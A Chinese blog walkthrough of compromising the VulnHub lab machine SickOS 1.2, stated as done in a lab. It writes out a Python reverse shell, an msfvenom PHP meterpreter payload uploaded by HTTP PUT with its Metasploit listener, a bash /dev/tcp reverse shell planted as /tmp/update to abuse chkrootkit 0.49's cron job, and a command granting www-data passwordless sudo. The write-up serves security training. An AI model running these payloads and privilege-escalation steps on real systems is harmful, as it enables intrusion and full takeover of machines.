vulnhub渗透日记08:sickos1.2

本文描述了一次在SickOS12靶机上的渗透测试过程,包括通过信息收集找到/test/目录,利用文件上传功能写入PHP后门,尝试反弹shell并最终通过修改chkrootkit的update文件进行提权,最后通过给予www-datasudo权限获得root权限。
摘要由CSDN通过智能技术生成

前言

⏰时间:2023.7.20
🗺️靶机地址:https://www.vulnhub.com/entry/sickos-12,144/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

在这里插入图片描述在这里插入图片描述在这里插入图片描述看看80端口
在这里插入图片描述把图片down下来strings分析了下,也没啥
dirb扫目录扫到/test/
在这里插入图片描述

文件上传

有文件读取,试试看能不能文件上传
改为put可以成功
在这里插入图片描述试试写入一句话
在这里插入图片描述在这里插入图片描述看有没有python
在这里插入图片描述

反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.153",7878));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

但是反弹不了,可能有防火墙限制
用msf的反弹shell,端口443试试

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.58.153 LPORT=443 -f raw > shell.php

上传shell.php

curl -v -H 'Expect:' -T shell.php "http://192.168.58.154/test/"
-v:显示详细的输出信息,包括请求和响应的头部信息。
-H 'Expect:':在请求头中添加一个Expect标头字段,值为空,避免请求头出现Expect: 100-continue ,从而引发不必要的错误
-T shell.php:将本地的shell.php文件作为请求主体发送到服务器。
"http://192.168.247.142/test/" : 指定上传文件的目标url路径

不加 -H ‘Expect:’,失败,并不是所有的 Server 都会正确响应100-continue,反而会返回417 Expectation Failed
在这里插入图片描述加-H ‘Expect:’,成功
在这里插入图片描述msf配置监听

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.58.153
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > run

点击shell.php上线
在这里插入图片描述在这里插入图片描述python -c ‘import pty;pty.spawn(“/bin/bash”)’ 拿到稳定shell
在这里插入图片描述

寻找提权点

上传linpeas.sh扫描
存在内核提权
在这里插入图片描述在这里插入图片描述在这里插入图片描述计划任务是root运行的
在这里插入图片描述sudo用户
在这里插入图片描述搜一下计划任务

find / -name cron* 2>/dev/null

在这里插入图片描述
在这里插入图片描述在/etc/cron.hourly里发现chkrootkit, 是个监测rootkit木马的工具
在这里插入图片描述

chkrootkit提权

同样搜一下相关文件,看下版本是0.49
在这里插入图片描述搜索利用exp得到提示

- Put an executable file named 'update' with non-root owner in /tmp 
(not mounted noexec, obviously)
# 在/tmp中放置一个名为“update”的非root所有者的可执行文件
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
# 文件/tmp/update将以root用户身份执行,因此,如果文件中放置了恶意内容,则可以有效地root您的机器。
If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
#如果攻击者知道您定期运行chkrootkit (比如cron.daily),并且对/tmp (没有挂载noexec) 有写权限,那么他很容易利用这一点。
echo'#!/bin/bash\nbash -i >& /dev/tcp/192.168.247.129/443 0>&1\n' > /tmp/update
chmod 777 /tmp/update
nc -nlvp 443

在这里插入图片描述查看newRule文件,防火墙只允许22,80,8080,443通过
在这里插入图片描述

sudo提权

rm -f update #删除之前的update
#给www-data加入sudo权限:
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update
ls -la /etc/sudoers  #等一会儿查看
sudo su          #成功获得root权限

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值